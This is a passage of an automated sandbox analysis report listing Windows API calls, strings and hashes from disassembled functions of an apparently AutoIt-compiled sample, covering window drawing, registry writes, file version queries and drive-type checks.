                            • SelectObject.GDI32(?,00000000), ref: 000ED151
                            • InflateRect.USER32(?,000000FF,000000FF), ref: 000ED17C
                            • GetSysColor.USER32(00000010), ref: 000ED184
                            • CreateSolidBrush.GDI32(00000000), ref: 000ED18B
                            • FrameRect.USER32(?,?,00000000), ref: 000ED19A
                            • DeleteObject.GDI32(00000000), ref: 000ED1A1
                            • InflateRect.USER32(?,000000FE,000000FE), ref: 000ED1EC
                            • FillRect.USER32(?,?,00000000), ref: 000ED21E
                            • GetWindowLongW.USER32(?,000000F0), ref: 000ED249
                              • Part of subcall function 000ED385: GetSysColor.USER32(00000012), ref: 000ED3BE
                              • Part of subcall function 000ED385: SetTextColor.GDI32(?,?), ref: 000ED3C2
                              • Part of subcall function 000ED385: GetSysColorBrush.USER32(0000000F), ref: 000ED3D8
                              • Part of subcall function 000ED385: GetSysColor.USER32(0000000F), ref: 000ED3E3
                              • Part of subcall function 000ED385: GetSysColor.USER32(00000011), ref: 000ED400
                              • Part of subcall function 000ED385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 000ED40E
                              • Part of subcall function 000ED385: SelectObject.GDI32(?,00000000), ref: 000ED41F
                              • Part of subcall function 000ED385: SetBkColor.GDI32(?,00000000), ref: 000ED428
                              • Part of subcall function 000ED385: SelectObject.GDI32(?,?), ref: 000ED435
                              • Part of subcall function 000ED385: InflateRect.USER32(?,000000FF,000000FF), ref: 000ED454
                              • Part of subcall function 000ED385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000ED46B
                              • Part of subcall function 000ED385: GetWindowLongW.USER32(00000000,000000F0), ref: 000ED480
                              • Part of subcall function 000ED385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000ED4A8
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                            • String ID:
                            • API String ID: 3521893082-0
                            APIs
                            • DestroyWindow.USER32 ref: 00084956
                            • DeleteObject.GDI32(00000000), ref: 00084998
                            • DeleteObject.GDI32(00000000), ref: 000849A3
                            • DestroyIcon.USER32(00000000), ref: 000849AE
                            • DestroyWindow.USER32(00000000), ref: 000849B9
                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 000FE179
                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 000FE1B2
                            • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 000FE5E0
                              • Part of subcall function 000849CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00084954,00000000), ref: 00084A23
                            • SendMessageW.USER32 ref: 000FE627
                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 000FE63E
                            • ImageList_Destroy.COMCTL32(00000000), ref: 000FE654
                            • ImageList_Destroy.COMCTL32(00000000), ref: 000FE65F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                            • String ID: 0
                            • API String ID: 464785882-4108050209
                            APIs
                            • DestroyWindow.USER32(00000000), ref: 000DA42A
                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 000DA4E9
                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 000DA527
                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 000DA539
                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 000DA57F
                            • GetClientRect.USER32(00000000,?), ref: 000DA58B
                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 000DA5CF
                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 000DA5DE
                            • GetStockObject.GDI32(00000011), ref: 000DA5EE
                            • SelectObject.GDI32(00000000,00000000), ref: 000DA5F2
                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 000DA602
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000DA60B
                            • DeleteDC.GDI32(00000000), ref: 000DA614
                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 000DA642
                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 000DA659
                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 000DA694
                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 000DA6A8
                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 000DA6B9
                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 000DA6E9
                            • GetStockObject.GDI32(00000011), ref: 000DA6F4
                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 000DA6FF
                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 000DA709
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                            • API String ID: 2910397461-517079104
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 000CE45E
                            • GetDriveTypeW.KERNEL32(?,0011DC88,?,\\.\,0011DBF0), ref: 000CE54B
                            • SetErrorMode.KERNEL32(00000000,0011DC88,?,\\.\,0011DBF0), ref: 000CE6B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ErrorMode$DriveType
                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                            • API String ID: 2907320926-4222207086
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                            • API String ID: 1038674560-86951937
                            APIs
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 000EC598
                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 000EC64E
                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 000EC669
                            • SendMessageW.USER32(?,000000F1,?,00000000), ref: 000EC925
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$Window
                            • String ID: 0
                            • API String ID: 2326795674-4108050209
                            APIs
                            • CharUpperBuffW.USER32(?,?,0011DBF0), ref: 000E6245
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: BuffCharUpper
                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                            • API String ID: 3964851224-45149045
                            • Opcode ID: 2d6616afc1a4eab0a5bbc673075a570316ec6bddfc5034494c66def5d93db06f
                            • Instruction ID: 5efb0550417b1cc5ea5fbc64fde04bea06725b33c121edeab570b922fc67f994
                            • Opcode Fuzzy Hash: 2d6616afc1a4eab0a5bbc673075a570316ec6bddfc5034494c66def5d93db06f
                            • Instruction Fuzzy Hash: B8C1A5342046418FCB54EF14D451AEE77E5AFA43D0F444869B892AB397CF32ED0ACB82
                            APIs
                            • GetSysColor.USER32(00000012), ref: 000ED3BE
                            • SetTextColor.GDI32(?,?), ref: 000ED3C2
                            • GetSysColorBrush.USER32(0000000F), ref: 000ED3D8
                            • GetSysColor.USER32(0000000F), ref: 000ED3E3
                            • CreateSolidBrush.GDI32(?), ref: 000ED3E8
                            • GetSysColor.USER32(00000011), ref: 000ED400
                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 000ED40E
                            • SelectObject.GDI32(?,00000000), ref: 000ED41F
                            • SetBkColor.GDI32(?,00000000), ref: 000ED428
                            • SelectObject.GDI32(?,?), ref: 000ED435
                            • InflateRect.USER32(?,000000FF,000000FF), ref: 000ED454
                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000ED46B
                            • GetWindowLongW.USER32(00000000,000000F0), ref: 000ED480
                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000ED4A8
                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 000ED4CF
                            • InflateRect.USER32(?,000000FD,000000FD), ref: 000ED4ED
                            • DrawFocusRect.USER32(?,?), ref: 000ED4F8
                            • GetSysColor.USER32(00000011), ref: 000ED506
                            • SetTextColor.GDI32(?,00000000), ref: 000ED50E
                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 000ED522
                            • SelectObject.GDI32(?,000ED0B5), ref: 000ED539
                            • DeleteObject.GDI32(?), ref: 000ED544
                            • SelectObject.GDI32(?,?), ref: 000ED54A
                            • DeleteObject.GDI32(?), ref: 000ED54F
                            • SetTextColor.GDI32(?,?), ref: 000ED555
                            • SetBkColor.GDI32(?,?), ref: 000ED55F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                            • String ID:
                            • API String ID: 1996641542-0
                            • Opcode ID: e371cec0a331b38b689f85960304a5bab6310b6a34a9e9db1f78693e2b440205
                            • Instruction ID: 680b7f4283d84854b19cf6f05092a00c3bac2f5cada7806e450bd02cc7dd5c17
                            • Opcode Fuzzy Hash: e371cec0a331b38b689f85960304a5bab6310b6a34a9e9db1f78693e2b440205
                            • Instruction Fuzzy Hash: 95512E71900208AFDF109FA5EC48EAE7BB9FB48320F104515FA55AB2A1D7B59A80DF50
                            APIs
                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 000EB5C0
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000EB5D1
                            • CharNextW.USER32(0000014E), ref: 000EB600
                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 000EB641
                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 000EB657
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000EB668
                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 000EB685
                            • SetWindowTextW.USER32(?,0000014E), ref: 000EB6D7
                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 000EB6ED
                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 000EB71E
                            • _memset.LIBCMT ref: 000EB743
                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 000EB78C
                            • _memset.LIBCMT ref: 000EB7EB
                            • SendMessageW.USER32 ref: 000EB815
                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 000EB86D
                            • SendMessageW.USER32(?,0000133D,?,?), ref: 000EB91A
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 000EB93C
                            • GetMenuItemInfoW.USER32(?), ref: 000EB986
                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 000EB9B3
                            • DrawMenuBar.USER32(?), ref: 000EB9C2
                            • SetWindowTextW.USER32(?,0000014E), ref: 000EB9EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                            • String ID: 0
                            • API String ID: 1073566785-4108050209
                            • Opcode ID: 435b33e4139a1fde4da32ae68677519759b369fcd3b5e6c6902aafc785887349
                            • Instruction ID: 2135a49c822803eb3d087bfa02bd5d97436c22cecf9c6a4bc3d8527d5cfd80fe
                            • Opcode Fuzzy Hash: 435b33e4139a1fde4da32ae68677519759b369fcd3b5e6c6902aafc785887349
                            • Instruction Fuzzy Hash: 50E17E75900258AFDF209F96CC84EEF7BB8FF05710F14815AF959AA191DB748A81CF60
                            APIs
                            • GetCursorPos.USER32(?), ref: 000E7587
                            • GetDesktopWindow.USER32 ref: 000E759C
                            • GetWindowRect.USER32(00000000), ref: 000E75A3
                            • GetWindowLongW.USER32(?,000000F0), ref: 000E7605
                            • DestroyWindow.USER32(?), ref: 000E7631
                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 000E765A
                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000E7678
                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 000E769E
                            • SendMessageW.USER32(?,00000421,?,?), ref: 000E76B3
                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 000E76C6
                            • IsWindowVisible.USER32(?), ref: 000E76E6
                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 000E7701
                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 000E7715
                            • GetWindowRect.USER32(?,?), ref: 000E772D
                            • MonitorFromPoint.USER32(?,?,00000002), ref: 000E7753
                            • GetMonitorInfoW.USER32 ref: 000E776D
                            • CopyRect.USER32(?,?), ref: 000E7784
                            • SendMessageW.USER32(?,00000412,00000000), ref: 000E77EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                            • String ID: ($0$tooltips_class32
                            • API String ID: 698492251-4156429822
                            • Opcode ID: 149b992f67937c7a0b4b34b954624b574cecaaddb39c159efdd002eaec520ddc
                            • Instruction ID: 5d133f6b86915c1f76551a67e0392011915730f69e442b0138d1b2f584f9adc1
                            • Opcode Fuzzy Hash: 149b992f67937c7a0b4b34b954624b574cecaaddb39c159efdd002eaec520ddc
                            • Instruction Fuzzy Hash: A3B1AD71608740AFDB54DF69C848B6ABBE5FF88310F00891DF59DAB292DB71E844CB91
                            APIs
                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 000C76ED
                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 000C7713
                            • _wcscpy.LIBCMT ref: 000C7741
                            • _wcscmp.LIBCMT ref: 000C774C
                            • _wcscat.LIBCMT ref: 000C7762
                            • _wcsstr.LIBCMT ref: 000C776D
                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 000C7789
                            • _wcscat.LIBCMT ref: 000C77D2
                            • _wcscat.LIBCMT ref: 000C77D9
                            • _wcsncpy.LIBCMT ref: 000C7804
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                            • API String ID: 699586101-1459072770
                            • Opcode ID: a7746f207812ae8252072f3678dd102554d101c40a1273e0f7609f1855f90ebc
                            • Instruction ID: 9696f04048ff0dfd7a24cc471f2c2e1207f8c2643399be5d5dbb11304ebd3df9
                            • Opcode Fuzzy Hash: a7746f207812ae8252072f3678dd102554d101c40a1273e0f7609f1855f90ebc
                            • Instruction Fuzzy Hash: E241F372944204BAEB05B7B49C47FFF77ACEF16720F00016AF904A6193EB749A41DAA1
                            APIs
                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0009A839
                            • GetSystemMetrics.USER32(00000007), ref: 0009A841
                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0009A86C
                            • GetSystemMetrics.USER32(00000008), ref: 0009A874
                            • GetSystemMetrics.USER32(00000004), ref: 0009A899
                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0009A8B6
                            • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0009A8C6
                            • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0009A8F9
                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0009A90D
                            • GetClientRect.USER32(00000000,000000FF), ref: 0009A92B
                            • GetStockObject.GDI32(00000011), ref: 0009A947
                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 0009A952
                              • Part of subcall function 0009B736: GetCursorPos.USER32(000000FF), ref: 0009B749
                              • Part of subcall function 0009B736: ScreenToClient.USER32(00000000,000000FF), ref: 0009B766
                              • Part of subcall function 0009B736: GetAsyncKeyState.USER32(00000001), ref: 0009B78B
                              • Part of subcall function 0009B736: GetAsyncKeyState.USER32(00000002), ref: 0009B799
                            • SetTimer.USER32(00000000,00000000,00000028,0009ACEE), ref: 0009A979
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                            • String ID: AutoIt v3 GUI
                            • API String ID: 1458621304-248962490
                            • Opcode ID: b3005a3fb5c30bee94d47dca2a92c0752871557c40ee47bb9a046cc3ac7f9344
                            • Instruction ID: fd27d1e6798cb832428a962ab53a656d9c8093c25f0e3e32803f9a2195c6ef95
                            • Opcode Fuzzy Hash: b3005a3fb5c30bee94d47dca2a92c0752871557c40ee47bb9a046cc3ac7f9344
                            • Instruction Fuzzy Hash: 77B17A75A0020AAFDF14DFA8DC45BAE7BB4FB09314F104229FA55A76A0DB70D881DB91
                            APIs
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000E3626
                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0011DBF0,00000000,?,00000000,?,?), ref: 000E3694
                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 000E36DC
                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 000E3765
                            • RegCloseKey.ADVAPI32(?), ref: 000E3A85
                            • RegCloseKey.ADVAPI32(00000000), ref: 000E3A92
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Close$ConnectCreateRegistryValue
                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                            • API String ID: 536824911-966354055
                            • Opcode ID: 0ed3123452f08a1aae847beaca1ec84e952dc5f438adec1c5879d4c8b4d955e5
                            • Instruction ID: f8048138ad89abdc932c83f8a0830ec4ec342b8e81670ee74f69e9ddc884eb56
                            • Opcode Fuzzy Hash: 0ed3123452f08a1aae847beaca1ec84e952dc5f438adec1c5879d4c8b4d955e5
                            • Instruction Fuzzy Hash: A3027B752006519FCB14EF25C895E6ABBE5FF89720F04845DF88AAB362DB30ED41CB81
                            APIs
                            • CharUpperBuffW.USER32(?,?), ref: 000E6A52
                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 000E6B12
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: BuffCharMessageSendUpper
                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                            • API String ID: 3974292440-719923060
                            • Opcode ID: 1e428f4a8bc562be06616a03dfd3b12c0f5bf0a89724382e7147f37368f4feae
                            • Instruction ID: 0543664bc84989ddc5d18248be80e54b32cfb0e1310233361bb1489163754dac
                            • Opcode Fuzzy Hash: 1e428f4a8bc562be06616a03dfd3b12c0f5bf0a89724382e7147f37368f4feae
                            • Instruction Fuzzy Hash: 12A18E302043419FCB14EF15D951ABAB3E5FF953A4F148869B8A6AB393DB31EC05CB42
                            APIs
                            • GetClassNameW.USER32(00000008,?,00000400), ref: 000BE6E1
                            • _wcscmp.LIBCMT ref: 000BE6F2
                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 000BE71A
                            • CharUpperBuffW.USER32(?,00000000), ref: 000BE737
                            • _wcscmp.LIBCMT ref: 000BE755
                            • _wcsstr.LIBCMT ref: 000BE766
                            • GetClassNameW.USER32(00000018,?,00000400), ref: 000BE79E
                            • _wcscmp.LIBCMT ref: 000BE7AE
                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 000BE7D5
                            • GetClassNameW.USER32(00000018,?,00000400), ref: 000BE81E
                            • _wcscmp.LIBCMT ref: 000BE82E
                            • GetClassNameW.USER32(00000010,?,00000400), ref: 000BE856
                            • GetWindowRect.USER32(00000004,?), ref: 000BE8BF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                            • String ID: @$ThumbnailClass
                            • API String ID: 1788623398-1539354611
                            • Opcode ID: 55e1f9d687264b2473da51d7b27228ed64570a6724d90652fc257337894861de
                            • Instruction ID: 0073a4caa13074035f380edb6c1ff749b555a99dc8245ecf2d3e86819c225ece
                            • Opcode Fuzzy Hash: 55e1f9d687264b2473da51d7b27228ed64570a6724d90652fc257337894861de
                            • Instruction Fuzzy Hash: DA81BE310082859FDB55DF54C885FEA7BE8FF44714F14846AFD899A092DB30DD4ACBA1
                            APIs
                            Strings
                            Memory Dump Source
